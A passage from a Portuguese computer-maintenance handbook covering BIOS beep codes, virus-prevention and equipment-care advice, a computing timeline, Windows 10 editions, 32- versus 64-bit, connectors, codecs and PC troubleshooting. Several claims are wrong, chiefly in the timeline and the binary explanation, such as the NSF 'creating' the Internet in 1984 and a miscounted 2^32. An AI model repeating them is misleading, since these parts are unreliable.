2 Beeps - Problemas no circuito de Paridade.


R - Trocar memórias RAM por outras sabidamente boas.

3 Beeps - Problemas no circuito da memória básica.


R - O primeiro módulo SIMM está com problemas.

4 Beeps - Problemas na temporização.


R - Trocar conhecido como 80c206 ou correspondente.

5 Beeps - Problemas no microprocessador.


R - Trocar o microprocessador ou está mal encaixado.

342
6 Beeps - problemas no controlador de teclado 8042.
R - Verificar a configuração do teclado ou trocar o 8042.

7 Beeps - Problemas no microprocesador.


Procediementos a Executar - Trocar o microprocessador ou chipset.

8 Beeps - Erro de memória de vídeo ou placa interface.


R - Trocar as RAM,que pode ser da placa do sistema ou de vídeo.

9 Beeps - Problemas no circuito da ROM BIOS.


R - Trocar a Rom ou Chipset

10 beeps - Problemas no chipset.


R - Provavelmente trocar os chipsets.

Código de Som:

Nenhum beep - alto-falante


Beep Contínuo - Processador
Beep curtos repetitivos - Fonte
1 beep longo e 1 curto - Placa de sistema
1 beep longo e 2 curtos - Interface de vídeo
1 beep longo e 3 curtos - Interface de vídeo
3 beeps curtos - Interface de vídeo
1 beep longo e 1 curto - Inteface de vídeo
1 beep curto e nada na tela - Monitor ou cabo

Conselhos aos usuários

Algumas regras devem ser básicas no dia-a-dia:


1 - Cuidado com os periféricos de manutenção utilizados pelos técni-
cos de software ou hardware, eles são os maiores portadores de ví-
rus por andarem de computador em computador, vacine-os antes de
permitir o uso em seu micro.
2 - Os CDs ou DVDs que acompanham placas de hardware, tipo pla-
cas VGA, multi I/O, placas mãe de PC, placas de rede, etc., de pro-
cedência fácil e barata devem ser vacinados, não raramente trazem
consigo vírus "incríveis".

343
3 - A pirataria de software via internet é sem dúvida uma das mais
prolíferas e contaminadas com vírus, ao baixar arquivos, corre-se o
risco para descobrir que se deu mal.
4 - Nunca acredite que o seu micro computador está livre de vírus
porque só você o usa, aquele pen driver que você emprestou para um
amigo pode voltar "bixado".
5 - Periodicamente vacine todos seu periféricos e HD,... nunca se
sabe.
6 - Tenha certeza de que o disco rígido do seu computador não con-
tém vírus, instale uma vacina eficiente e mantenha-a residente no
HD, assim basta um clique em um periférico contaminado e este será
recusado, não contaminando o computador.
7 - Periodicamente e com prazo não superior a 90 dias, atualize ma-
nualmente a vacina que você utiliza ou providencie uma nova versão.
Evite uma versão pirateada, você pode estar adquirindo uma vacina
já com vírus.
8 - Faça Backup Diariamente, se acontecer a destruição dos dados
de seu HD, seja por vírus ou outra razão qualquer, você poderá recu-
perar todos os dados em backup.

Outros conselhos

1 - Evite pancadas ou esbarrões na mesa onde está colocado o micro


computador, quanto menos mudá-lo de posição, maior sua durabili-
dade;
2 - Evite também aqueles belos socos quando algo não vai bem;
3 - Não use de força na digitação, um toque suave nas teclas produzi-
rá o mesmo efeito desejado, ao passo que pressão em demasia dani-
ficará os contatos do teclado e poderá romper as trilhas da PCI;
4 - Após um dia de trabalho, tire backup dos principais arquivos, não
corra riscos desnecessários, um vírus poderá destruir todo seu traba-
lho;
5 - Antes de desligar o micro, se necessário, use um estacionador de
cabeças de leitura e gravação. Disco rígidos do tipo IDE não necessi-
tam de estacionador, são do tipo auto park. Evite ligar e desligar o
computador muitas vezes ao dia;
6 - Não fume em ambiente próprio de CPD;

344
7 - Não beba líquidos e nem apoie frascos com conteúdos líquidos
sobre a mesa do computador, a queda de líquidos sobre o teclado,
CPU ou monitor de vídeo causará perdas irreparáveis;
8 - Mantenha o equipamento limpo. Após o uso, cubra a máquina e o
teclado com uma capa própria ou use um pano comum;
9 - Coloque o computador afastado de máquinas que provoquem
interferências na rede elétrica, como terminais de vídeo, ferro elétrico,
furadeiras, máquinas de solda elétrica ou equipamentos eletrostáti-
cos;
10 - Previna-se contra vírus, não use cópias piratas de programas,
desconfie dos periféricos que receber de outras pessoas, utilize sem-
pre programas detectores para impedir a contaminação de seu siste-
ma;
11 - Exija treinamento sobre as etapas de operação da máquina, e,
pelo menos, uma introdução aos meandros do Sistema Operacional
que seja de seu uso profissional;
12 - Leia o manual que veio com a máquina. Muitas vezes ali está a
resposta para o problema que o computador ou a impressora está
enfrentando.

Resumo dos Principais Fatos até 1999

XVII - O francês Blaise Pascal projeta uma calculadora que soma e


subtrai e o alemão Gottfried Wilhelm Leibniz incorpora operações de
multiplicar e dividir à máquina.
XVIII - O francês Joseph Marie Jacquard constrói um tear automati-
zado: cartões perfurados controlam o movimento da máquina.
1834 - O inglês Charles Babbage projeta a máquina analítica capaz
de armazenar informações.
1847 - O inglês George Boole estabelece a lógica binária para arma-
zenar informações.
1890 - O norte-americano Hermann Hollerith constrói o primeiro com-
putador mecânico.
1924 - Nasce a International Business Machines Corporation (IBM),
nos Estados Unidos.
1938 - O alemão Konrad Zuse faz o primeiro computador elétrico
usando a teoria binária.
1943 - O inglês Alan Turing constrói a primeira geração de computa-
dores modernos, que utilizam válvulas.

345
1944 - O norte-americano Howard Aiken termina o Mark I, o primeiro
computador eletromecânico.
1946 - O Eletronic Numerical Integrator and Computer (Eniac), primei-
ro computador eletrônico, é criado nos EUA.
1947 - Criação do transistor, substituto da válvula, que permite má-
quinas mais rápidas.
1957 - Primeiros modelos de computadores transistorizados chegam
ao mercado.
1958 - Criação do chip, circuito integrado que permite a miniaturiza-
ção dos equipamentos eletrônicos.
1969 - Criação da Arpanet, rede de informações do Departamento de
Defesa norte-americano interligando universidades e empresas, que
dará origem à Internet.
1974 - A Intel projeta o microprocessador 8080, que origina os micro-
computadores.
1975 - Os norte-americanos Bill Gates e Paul Alen fundam a Micro-
soft.
1976 - Lançamento do Apple I, primeiro microcomputador comercial,
inventado por Steves Jobs e por Steves Woznick.
1981 - A IBM o lança seu microcomputador - o PC - com o sistema
operacional MS-DOS, elaborado pela Microsoft.
1983 - A IBM lança o PC-XT, com disco rígido.
1984 - A National Science Foundation, nos Estados Unidos, cria a
Internet, rede mundial de computadores que conecta governos, uni-
versidades e companhias.
1984 -- A Apple lança o Macintosh, primeiro computador a utilizar
ícones e mouse.
1985 - A Microsoft lança o Windows para o PC, que só obtém suces-
so com a versão 3.0 (1990).
1993 - A Intel lança o Pentium.
1998 - A Intel lança o Pentium II.
1999 - A Intel lança o Pentium III.

Windows 10 tem sete edições; veja quais são elas

O Windows 10 está quase pronto para chegar em nossos computado-


res e smartphones, mas enquanto isso não acontece, ele continua
passando por testes e novidades vão sendo apresentadas. Nesta
quarta-feira (13), a Microsoft anunciou que existirão sete versões do

346
sistema operacional e revelou os nomes e detalhes de cada um de-
les.
Conheça quais são:

Windows 10 Home
Dedicada aos consumidores comuns, esta versão acompanha aplica-
tivos básicos, como a nova assistente pessoal Cortana, o no-
vo navegador Microsoft Edge e a ferramenta de reconhecimento faci-
al Windows Hello. Também haverá uma integração com o Xbox na
qual os proprietários do console poderão reproduzir os seus jogos a
partir de qualquer PC.

Windows 10 Mobile
A versão mobile promete oferecer ao usuário uma melhor experiência
em dispositivos pequenos com touchscreen, como smartphones e
tablets menores. Ela conta com os mesmos novos aplicativos da pri-
meira versão, assim como uma opção mais otimizada para toque do
Office. O Windows 10 Mobile também deve permitir que alguns novos
dispositivos usem o Continuum, fazendo com que o celu-
lar funcione como um PC quando conectado em uma tela maior.

Windows 10 Pro
Bastante parecido com o Windows 10 inicial, ele tem a diferença de
oferecer recursos extras para atender às necessidades de pequenas
empresas. Ele ajuda no gerenciamento de seus dispositivos e aplica-
tivos, protege dados sensíveis e tem suporte a recursos em nuvem,
como acesso remoto.

Windows 10 Enterprise
Parecido com o Windows 10 Pro, o Enterprise é indicado para médias
e grandes empresas. Com ele, a companhia fica protegida contra as
crescentes ameaças a dispositivos, identidade e dados sigilosos.
Também deve ter suporte ao serviço chamado "Long Term Servicing
Branch" que, quando está ativado, somente atualizações relacionada
à segurança serão aplicadas.

Windows 10 Education

347
A única informação divulgada pela Microsoft sobre essa versão é que
ela será dedicada à educação, tanto para professores e administrado-
res, quanto para estudantes.

Windows 10 Mobile Enterprise


Esta versão é, basicamente, a união da versão mobile com a Enter-
prise. Ela vai acompanhar recursos de segurança e gerenciamento
exclusivos para grandes empresas.

Windows 10 IoT Core


Voltado para a IoT, ou a Internet das Coisas, esta versão do sistema
operacional terá um baixo consumo do hardware.
A Microsoft também anunciou, além das sete principais, versões do
Windows 10 Enterprise e Mobile Enterprise para dispositivos industri-
ais, como caixas eletrônicos, pontos de venda, terminais portáteis,
entre outros.
O Windows 10 teve seu lançamento no mês de julho de 2015, de
forma gradativa, com o update gratuito para usuários de Windows 7,
Windows 8, Windows 8.1 e Windows Phone 8.1, originais.

32-bits ou 64-bits: qual a diferença na prática para o seu PC?

Você já ficou em dúvida entre instalar a versão 32-bits ou 64-bits de


algum programa? Se sim, este texto pode lhe interessar. Vamos falar
de qual é a diferença entre esses dois padrões, quando é possível
misturá-los e qual é a melhor versão para se instalar em cada situa-
ção.

Até 2003, apenas processadores 32-bits eram compatíveis com o


Windows. A AMD, no entanto, lançou naquele ano um processador
64-bits compatível com o sistema operacional. A partir dessa data, a
Microsoft começou a pensar em melhorar seu software para aprovei-
tar essa nova capacidade dos processadores.

Atualmente, a maioria dos processadores novos são 64-bits. Mas


processadores 32-bits, e versões do Windows específicas para esses
processadores, ainda existem, o que acaba causando confusão em
alguns usuários. Saiba qual é a diferença entre eles.

348
Bits e código binário

Um bit é a unidade mínima de informação para computadores. Cada


bit pode ser 1 ou 0. Por isso, diz-se que os computadores funcionam
com códigos binários: no nível microscópico, a informação e manuse-
ada pelos computadores na formas de trilhões de sequências de 1s e
0s.

O código binário permite escrever qualquer número inteiro, da seguin-


te forma: cada 1 ou 0 se refere a uma potência de 2. O primeiro, a 2 0;
o segundo, a 21, e assim por diante. O computador vê uma sequência
de dígitos, multiplica cada potência de 2 (da esquerda para direita)
por 0 ou 1 e chega a um número.

A sequência 10, por exemplo (de dois bits), equivale a 2 (0x2 0 +


1x21). A sequência 111 tem três bits, e equivale a 7 (1x20 + 1x21 +
1x22). A sequência de 4 bits 1001 equivale ao número 9 (1x2 0 +
0x21 + 0x22 + 1x23). Como se pode perceber, quando mais bits você
usa, mais números você consegue escrever.

Processadores

Para processadores, os termos 32-bits e 64-bits referem-se ao tama-


nho de seu registro. O registro de um processador é o local onde ele
armazena os "endereços" dos dados que ele precisa acessar mais
rapidamente para funcionar bem. Esses "endereços" são números
por meio dos quais o processador pode acessar a informação de que
precisa.

Processadores de 32-bits conseguem guardar um total de 232,


ou 4.294.967.295 endereços diferentes. Esses endereços apontam
para a memória RAM, onde as informações de que o processador
precisa ficam armazenadas.

Por esse motivo, processadores de 32 bits só conseguem aproveitar,


no máximo, 4GB de RAM. A máquina pode até ter mais memória
instalada, mas o processador não conseguirá acessá-la, pois só con-
segue distribuir endereços para os primeiros 4 GB.

349
Processadores de 64 bits, por sua vez, conseguem guardar:
264, ou 18.446.744.073.709.551.616 endereços diferentes! Por esse
motivo, podem acessar muito mais RAM do que seus companheiros
mais novos. Eles conseguiriam distribuir endereços para 17 bilhões
de GB de RAM, mas computadores atuais raramente suportam mais
que 64GB.

Além de ser capaz de acessar mais RAM, os processadores de 64-


bits também conseguem acessá-la de maneira mais rápida e eficien-
te, o que acaba deixando o computador mais rápido também.

Sistemas operacionais

O sistema operacional é o software que diz ao computador como


deve utilizar seus componentes. De certa forma, ele ensina ao com-
putador como deve funcionar. Dessa forma, mesmo que o seu pro-
cessador seja de 64-bits, ele não aproveitará esse tamanho expandi-
do de registro se você não instalar um sistema operacional de 64-bits
também!

Para saber se o seu processador é 32-bits ou 64-bits

Uma série de programas podem ser utilizados:

Everest, CpuZ e CCleaner. São programas pequenos que podem ser


baixados da internet.

Para saber se o seu Windows é 32 ou 64-bits, vá no menu iniciar,


clique com o botão direito em "Computador" e selecione "Proprieda-
des". Na janela que se abrirá, verifique, sob a aba "Sistema", a infor-
mação "Tipo de Sistema". A resposta deve estar lá.

Se o seu processador é 64-bits, é sempre melhor instalar um


sistema operacional de 64-bits também, para que ele possa funci-
onar com o máximo de sua capacidade. Processadores de 64-bits
podem rodar sistemas operacionais de 32-bits, mas só poderão aces-
sar 4GB de RAM, e terão um desempenho inferior. Processadores
de 32-bits, por sua vez, não conseguem rodar sistemas operaci-
onais de 64-bits!

350
Outros programas

Alguns programas e aplicativos também já estão disponíveis em ver-


sões 32-bits e 64-bits. Uma das vantagens das versões 64-bits é que
elas podem usar mais memória. Programas 32-bits podem acessar
apenas uma quantidade limitada de RAM, que depende também do
processador e do sistema operacional.

Um programa 64 bits, por sua vez, pode acessar muito mais RAM.
Por isso, tarefas que consomem volumes muito grandes de RAM,
como edição de vídeos em HD, funcionarão consideravelmente me-
lhor em versões 64-bits.

Mas cuidado: os programas e aplicativos 64-bits só funcionarão


se instalados em cima de um sistema operacional de 64-
bits também! Em outras palavras, se o seu processador ou sistema
operacional funcionar em 32-bits, você não conseguirá instalar a ver-
são 64-bits do programa.

No entanto, se o seu processador e sistema operacional são 64-


bits mas o programa possui apenas versão 32-bits, não tem pro-
blema. Será possível instalá-lo e utilizá-lo normalmente.

Resumindo:

Se o seu processador é 64-bits, é melhor instalar um sistema opera-


cional 64-bits.

Um processador 64-bits suporta sistemas operacionais 32-bits (embo-


ra não funcione em plena capacidade), mas processadores 32-bits
não suportam sistemas operacionais 64-bits.

Aplicativos 64-bits só funcionarão se o processador e o sistema ope-


racional forem 64-bits também.

Não há problema em instalar aplicativos 32-bits em sistemas operaci-


onais e processadores 64-bits.

351
USB ou Thunderbolt? Entenda a guerra das conexões

Talvez o USB ainda seja o tipo de conexão mais popular. Lançado


oficialmente em 1995 (20 anos atrás), a conexão USB levou o uso
dos pendrives e de vários outros periféricos para outro nível de efici-
ência. A versão 1.0 oferecia velocidade de transmissão de apenas 12
megabits por segundo. No ano 2000, o padrão 2.0 elevou essa velo-
cidade para 480 megabits por segundo. Em 2009, o novo USB 3.0
atingiu velocidade máxima de 5 gigabits por segundo – dez vezes
mais rápido que seu antecessor. Hoje, este é o padrão presente na
maioria dos novos computadores portáteis e inclusive desktops –
Macs e PCs.

No ano passado surgiu o USB 3.1; a velocidade máxima de transfe-


rência chegou aos 10 gigabits por segundo (o dobro do USB 3.0).
Com essa velocidade, é possível, por exemplo, transferir um filme
completo em Full HD em menos de um segundo! Outra novidade no
mundo do USB é o conector Tipo-C! O USB 3.1 traz um novo conec-
tor projetado para substituir o tamanho padrão do USB e também as
conexões micro-USB. O conector é reversível; funciona dos dois la-
dos.

A maioria dos smartphones utiliza o micro-USB para se conectar ao


computador ou até mesmo ao carregador. A diferença fica por conta
da Apple, com o conector Lightning. Trata-se de um conector reversí-
vel compatível com os produtos lançados depois do iPhone 5.

A tecnologia Firewire, que vem caindo em desuso, é um tipo de cone-


xão semelhante ao USB. Desenvolvida pela Apple, o Firewire é uma
interface serial para computadores pessoais e aparelhos digitais de
áudio e vídeo. A primeira versão, o Firewire 400, oferecia velocidade
de até 400 megabits por segundo e foi lançado muito antes do USB
2.0. Mais recentemente, o Firewire 800 ampliou essa velocidade para
800 megabits por segundo. O problema é que, ainda hoje, a maioria
dos PCs não suporta o Firewire 800. É uma conexão que acabou
mais comum nos Macs profissionais.

Em 2011 foi lançado o Thunderbolt; conexão capaz de enviar e rece-


ber dados simultaneamente sem perda de velocidade nos dois senti-

352
dos. A primeira versão do padrão tinha velocidade de até 10 gigabits
por segundo. A segunda geração Thunderbolt dobrou essa velocida-
de, chegando a 20 gigabits de velocidade. Pela alta capacidade, a
porta Thunderbolt é capaz de enviar vídeo, áudio e dados; tudo ao
mesmo tempo.

O último lançamento em conexões é o Thunderbolt 3, anunciado pela


Intel no início do mês. É mais um passo em direção a adoção univer-
sal desse versátil conector. O Thunderbolt 3 transporta dados duas
vezes mais rápido que a versão anterior, alcançando velocidades de
até 40 gigabits por segundo. Por meio de adaptadores, o Thunderbolt
também suporta as saídas DVI, HDMI, DisplayPort e VGA; saídas de
vídeo que você vai conhecer agora.

O mais antigo – e bem antigo – é o VGA (Video Graphics Array); um


padrão introduzido em 1987 pela IBM. A conexão permite ligar o PC
em TVs mais antigas com resolução SD de 800 por 600 pixels. Esse
padrão também é conhecido como d-SUB. Já o DVI (Digital Visual
Interface) veio para melhorar a qualidade do vídeo digital em monito-
res e projetores. Já em formato 16 por 9, o DVI suporta resoluções de
até 60 quadros formados com 1920 pixels.

Em 2010, as conexões VGA e DVI começaram a ser substituídas pelo


DiplayPort e pelo HDMI. O DisplayPort é outra interface de vídeo;
mas, neste caso, também permite a transmissão de áudio. É um pa-
drão de alta resolução e múltiplas exibições com apenas uma cone-
xão. O DisplayPort não é encontrado em TVs; é um padrão exclusivo
de computadores, especialmente os da Apple. Um cabo com esta
conexão consegue transmitir imagens de até 3840 por 2160 pixels a
60 frames por segundo. Outra vantagem é que os cabos DisplayPort
também transmitem áudio com ótima qualidade.

Já o HDMI é uma interface 100% digital de áudio e vídeo, capaz de


transmitir dados não comprimidos. Exatamente por isso, é uma das
melhores alternativas para conteúdo em alta definição. Com o HDMI,
mais do que o Full HD, é possível inclusive transmitir vídeos em 4K.
O HDMI também oferece conectores mini e micro para serem usados
em smartphones.

353
Nesse momento, há uma dúvida: qual formato vai se tornar padrão
para conexões de computadores? A disputa está entre o novíssimo
Thunderbolt 3.0 e o USB 3.1 Tipo-C. Só o tempo dirá quem vai se
tornar hegemônico. Quando o assunto é áudio e vídeo, por enquanto,
o HDMI ainda reina soberano.

Codecs de vídeo: o que são, para que servem e tudo o que você
precisa saber

Amplamente utilizados, porém pouquíssimo conhecidos.

Os codecs de vídeo estão em nossas vidas praticamente desde sem-


pre. Eles se popularizaram, sobretudo, com o advento da banda lar-
ga e dos sistemas de compartilhamento de arquivos, uma dobradinha
que impulsionou o vai-e-vem de arquivos de vídeo por toda
a internet no final dos anos 1990 e começo dos anos 2000. Desde
então, aqui e acolá ouvimos falar em DivX, XviD, MPEG-4 e tantos
outros, contudo pouco sabemos sobre eles e qual a real importância
dessa sopa de letrinhas no nosso dia a dia.

Engana-se quem pensa que este é um assunto simples de se expli-


car. Cada codec leva anos para ser desenvolvido e está imbuído de
complexos algoritmos de compressão de dados. Contudo, lançare-
mos luzes sobre cada um deles no intuito de esclarecer um pouco
seu funcionamento e qual a melhor opção para você no seu dia a dia.
Vamos lá!

Afinal, o que são codecs?


Se você não faz a mínima ideia do que seja um codec, cabe uma
rápida explanação sobre eles. Conhecidos no meio técnico como
"coder/decoder", ou "codificador/descodificador" no bom e velho por-
tuguês, os codecs são ferramentas de codificação que processam e
armazenam vídeos em uma cadeia de bytes. Para isso, eles utilizam
algoritmos de compressão, que reduzem o tamanho não apenas das
imagens, mas também do áudio de cada arquivo de vídeo. Quando
necessário, ou seja, na hora de reprodução, esse mes-
mo algoritmo faz a tarefa inversa e descomprime as informações para
visualização pelo usuário.

354
Atualmente, há inúmeros tipos de codecs de vídeo por aí, cada um
utilizando uma tecnologia de compressão de dados diferente. Generi-
camente, contudo, pode-se dizer que existem dois tipos de codec: os
que fazem compressão com perdas (lossy) e os que fazem compres-
são sem perdas (lossless).

Compressão com perdas (lossy)


Por mais que as conexões ultrarrápidas de hoje em dia nos permitam
baixar centenas de gigabytes diariamente, a compressão lossy ainda
é um mal necessário. Esse tipo de compressão é utilizado principal-
mente quando se deseja reduzir o tamanho final de um arquivo e,
para isso, o codec comprime o vídeo e/ou o áudio de uma maneira
que o resultado final ainda seja aceitável.

Mas calma, não estamos falando aqui de filmes de mais de duas ho-
ras com menos de 100 MB, pelo contrário. Estamos falando de arqui-
vos de mais de 1 GB e duas horas de duração que, mesmo com per-
da de qualidade, ainda são capazes de encher os olhos dos mais
aficionados por qualidade.

Apesar disso, ainda há sim técnicas que comprimem os dados além


da conta (quem nunca baixou um vídeo em RMVB?). Logo, fica bas-
tante claro que, na realidade, existe toda uma variedade de codecs
que atende a uma gama enorme de pessoas, das mais exigentes até
as que só querem um arquivo pequeno para repassar para colegas
ou distribuir por aí na internet.

Compressão sem perdas (lossless)


Quando a ordem é qualidade total de som e vídeo, então entram em
ação os codecs lossless, que praticamente mantêm os arquivos como
eles vieram ao mundo. A coisa toda funciona como quando nós ape-
nas armazenamos arquivos dentro de uma pasta ZIP ou RAR, sem
nenhum tipo de comprimento.

Por causa dessas características, codecs desse tipo são pouquíssimo


utilizados por reles mortais como nós, já que o tamanho do arquivo
final é gigantesco e só faz sentido utilizá-los quando se trabalha com
propaganda, cinema e vídeo profissional. Como você já deve imagi-
nar, também é praticamente inviável utilizar arquivos tão grandes

355
assim para fazer transmissões sob demanda, como numa Netflix da
vida.

Para se ter uma ideia do absurdo disso tudo, aquele Blu-ray do seu
filme preferido provavelmente tem 50 gigabytes de dados nele, o que
já é bastante coisa. Agora, o primeiro trailer 4K (abaixo) do mundo
tem nada mais nada menos do que 160 gigabytes. Já um filme
em Full HD que usa um codec lossless pode ocupar até 410 giga-
bytes por hora de filmagem, sem contar o áudio que adicionaria 7
gigabytes por hora gravada nessa conta. Logo, fica bastante claro
que esse tipo de codec não passa nem perto dos nossos computado-
res, dispositivos móveis e televisores inteligentes.

Ainda vale ressaltar que os codecs são importantes não apenas por
comprimirem os dados de um vídeo, mas também fazerem o caminho
inverso. Se um vídeo for codificado utilizando, por exemplo, DivX, ele
só poderá ser reproduzido se o computador ou gadget oferecerem
suporte ao DivX. Caso contrário, problemas reprodução e compatibili-
dade poderão surgir durante a execução do arquivo.

Quais os codecs mais populares?


São inúmeras opções de codec que existem por aí a fora, mas certa-
mente alguns deles se destacam ou por terem apoio comercial ou por
simplesmente terem caído no gosto popular.

DivX/XviD
O DivX foi um dos primeiros codecs a fazer sucesso na internet. Cria-
do pela DivX Inc. no começo dos anos 2000, ele logo caiu no gosto
popular pela alta capacidade de compactação de vídeo. À época,
softwares de compartilhamento de arquivos como o KaZaa ajudaram
na conquista popular, já que as pessoas procuravam alternativas ao
formato MPEG, que praticamente dominava os computadores mas
não era lá essas coisas.

Não demorou muito e logo o DivX também caiu nas graças de gran-
des empresas do ramo do entretenimento, sobretudo aquelas que
apostaram em DVD Players. Aos poucos, esses aparelhos começa-
ram a chegar às lojas com o selo do codec, que a essa altura do
campeonato já se tornara um produto comercial. Foi a partir de então

356
que começamos a assistir vídeos baixados da internet nos aparelhos
de DVD em nossas salas, bastando gravar um disco com o arquivo e
inseri-lo na bandeja do DVD Player.

Nesse meio tempo, o XviD (DivX de trás para frente) surgiu como
uma alternativa open source ao DivX, que "se vendeu à indústria".
Seus desenvolvedores apostaram na mesma qualidade de compac-
tação dos arquivos, embora no começo os arquivos XviD apresentas-
sem tamanho ligeiramente maior e qualidade um pouco inferior.

Atualmente, no entanto, o XviD desponta como uma das melhores


opções de compactação de arquivos de vídeo e é amplamente utili-
zado por rippers que povoam a internet com filmes e séries piratas.
Por ser open source, o codec tem uma comunidade extremamente
ativa e sempre está recebendo atualizações.

MPEG-4
Pode-se dizer que o MPEG-4 é a evolução do desengonçado MPEG
amplamente utilizado no fim dos anos 1990. Essa fama, no entanto,
passa longe do MPEG-4, que atualmente é referência principalmente
quando o assunto é transmissão de vídeos sob demanda.

Xodó de serviços como Netflix, Hulu e outros do gênero, o grande


diferencial aqui é que os arquivos são compostos por duas ou mais
partes. A parte 2, também conhecida por MPEG-4 Part II, é a respon-
sável por codificar o vídeo em si utilizando outros tipos de codec de
vídeo, como o DivX e XviD. As outras 30 partes têm papeis específi-
cos e vão desde a sintetização de texturas e compressão de gráficos
3D, até compressão de áudio, que geralmente ocorre utilizando MP3.

H.264
O H.264 é relativamente novo no mercado e vem ganhando força
principalmente pela alta demanda por vídeos em alta definição. Por-
tanto, quando o assunto é vídeo HD, Full HD ou 4K, geralmente o
H.264 é utilizado nos bastidores.

O mais interessante de tudo é que ele é uma espécie de faca de dois


gumes, podendo atuar tanto como um codec lossy quanto lossless.
Fica a cargo do usuário definir a forma como o vídeo será comprimido

357
na hora da conversão, podendo-se escolher entre várias opções de
codificação, como o frame rate, qualidade de imagem e o tamanho
final do arquivo.

O grande diferencial do H.264 é que o usuário pode definir como quer


o arquivo final da conversão. Bitrate maior ou menor, mais qualidade
de imagem, menos prioridade para o áudio ou arquivo final com até X
gigabytes. Tudo isso pode ser ajustado usando H.264.

Tal qual o MPEG-4, o H.264 utiliza partes distintas para codificar áu-
dio e vídeo de um único arquivo. Geralmente, o vídeo é comprimido
utilizando x264, também podendo ser empregado o DivX ou XviD;
enquanto o áudio geralmente é comprimido utilizando AAC ou MP3.
Tudo dependerá da configuração escolhida pelo usuário no momento
da conversão.

Apesar dessa semelhança, o H.264 vem se destacando em relação


ao MPEG-4 por proporcionar melhores resultados em arquivos meno-
res, algo extremamente importante em tempos de transmissões Full
HD e Ultra HD.

Para finalizar, cabe explicar que os codecs são completamente dife-


rentes dos containers de vídeo. Enquanto aqueles têm como principal
função codificar e descodificar arquivos de vídeo, este existe apenas
para organizar áudio, vídeo e codecs num único pacote e facilitar a
vida dos usuários. Além disso, os containers também podem armaze-
nar metadados para informar, por exemplo, os capítulos de um DVD
ou Blu-ray, legendas ou diferentes faixas de áudio.

Alguns containers são bem populares e muitas vezes são confundi-


dos com codecs.

Vídeos em Flash (.flv e .swf)


Criado pela Macromedia antes dela ser engolida pela Adobe em
2005, o Flash é um container bastante antigo, mas muitíssimo popu-
lar na internet. Essa popularidade, no entanto, vem decaindo nos
últimos anos, pois a tecnologia vem apresentando sucessivos pro-
blemas de segurança e limitações que aparentemente não podem ser
contornadas.

358
O Flash é um container relativamente antigo e ganhou popularidade
graças à adoção da tecnologia por grandes sites como o YouTube.
Agora, no entanto, a tecnologia está sendo substituída aos poucos
pelo HTML5 e logo deve cair no ostracismo.

Há quem diga que a derrocada começou quando Steve Jobs desde-


nhou a tecnologia e disse que não ofereceria suporte a ela no iPhone
e, posteriormente, no iPad. Desde então, a popularidade do Flash
vem minguando e a chegada do HTML5 como um substituto à altura
parece ser o prego que faltava para selar o caixão. Agora só falta a
martelada.

MKV
Os frequentadores do Pirate Bay e sites afins certamente estão fami-
liarizados com o MKV. Figurinha carimbada em arquivos que usam
tapa olho e perna de pau, o MKV suporte praticamente qualquer for-
mato de vídeo e áudio graças a sua versatilidade, eficiência e adap-
tabilidade. Essas características fazem o container ser uma das me-
lhores opções para armazenar vídeo e áudio com qualidade num
arquivo de tamanho bastante razoável.

De quebra, o MKV ainda é capaz de suportar múltiplas trilhas de áu-


dio e arquivos de legenda, que podem ser acionados de acordo com
a preferência do usuário.

MP4
Se você quer fazer o upload de suas produções para a web, o MP4 é
o container que você deve utilizar. Presente nas recomendações de
grandes serviços de streaming, como YouTube e Vimeo, o MP4 é
capaz de armazenar arquivos de vídeo de excelente qualidade ocu-
pando pouquíssimo espaço. Tudo isso graças ao suporte do H.264
para codificar os vídeos e o AAC e MP3 para dar uma encolhida no
tamanho das trilhas de áudio.

Resumindo toda a história, a verdade é que dizer a um amigo que


está enviando um arquivo MP4 para ele não diz nada sobre qual co-
dec você utilizou para comprimir aquele vídeo e o seu áudio. Diz ape-

359
nas que você armazenou tudo, inclusive o codec, em um arquivo no
formato MP4 e está despachando para ele.

Caso você esteja em busca de um conselho sobre qual codec utilizar


nas suas produções, a recomendação é o H.264, que está se popula-
rizando rapidamente e provavelmente se tornará um padrão daqui a
algum tempo. Para despachar os arquivos para amigos e familiares e
distribui-lo pela internet, a recomendação é utilizar o MP4, que vem
ganhando popularidade e está presente em cada vez mais dispositi-
vos por aí a fora. Logo, é de se esperar que ele também se torne um
padrão em breve.

Como resolver 9 problemas comuns em PCs

Se você utiliza computadores Windows com frequência, provavelmen-


te você já se deparou com problemas universais. E, embora alguns
deles possam ter causas sérias e soluções custosas e complicadas, é
possível também que algumas rápidas mudanças consertem a má-
quina e facilitem sua vida.
Antes de começar, é importante conhecer uma ferramenta muito útil
para resolver problemas do computador: o gerenciador de dispositi-
vos do Windows. Ele pode ser acessado pelo menu iniciar, indo em
“painel de controle”, “hardware e sons” e “gerenciador de dispositi-
vos”. Ele mostra todo o hardware instalado em sua máquina, e identi-
fica problemas de instalação ou compatibilidade.

360
Veja abaixo algumas possíveis soluções para problemas comuns em
PCs:

Tela azul da morte

As temidas telas azuis do Windows podem aparecer por uma enorme


quantidade de motivos, desde arquivos maliciosos até problemas de
hardware. Em geral, porém, elas estão relacionadas a novos compo-
nentes instalados no computador. Caso você tenha instalado qual-
quer novo hardware, desde RAM até placas de áudio ou rede, e te-
nha começado a ver estas telas azuis, é provavel que o problema
seja de compatibilidade.

Na maioria dos casos, vale a pena conferir o Gerenciador de Disposi-


tivos para verificar se há algum conflito de hardware no computador.
Eles aparecerão como um pequeno “!” ao lado do dispositivo em
questão. Caso ele exista, provavelmente será necessário reinstalar os
drivers dos novos aparelhos, ou buscar drivers atualizados no site da
fabricante do hardware.

Caso o computador esteja fazendo barulhos estranhos além de mos-


trar a tela azul, o problema pode ter outros motivos: calor ou sujeira.

361
Nesses casos, pode ser suficiente abrir o computador de limpá-lo
para remover a poeira: ela pode causar problemas de contato entre
os componentes e dificultar a circulação de ar, aumentando a tempe-
ratura da máquina. Há ainda a possibilidade de que os ruídos sejam
causados por um HD antigo e com problemas. Nesse caso, é reco-
mendável fazer backup dos dados do HD e substituí-lo o quanto an-
tes.

Há ainda a possibilidade de um vírus ou de RAM com defeito. Um


bom escaneamento feito com programas de antivírus, mesmo gratui-
tos, pode detectar arquivos maliciosos em seu computador e, em
seguida, removê-lo. Existem também programas especializados para
testar a sua memória RAM. Caso ela apresente defeitos, eles podem
ser a causa das telas azuis. Infelizmente, é necessário substituí-la
para resolver o problema.

Som mudo

Uma das causas mais comuns que fazem com que os computadores
não emitam sons são problemas de contato com os cabos. Verifique,
primeiramente, se os cabos que vão de seu computador até a saída
de som (as caixas ou o fone) estão em boa condição. Deixe uma
música tocando e mexa no cabo para ver se o som aparece. Se isso

362
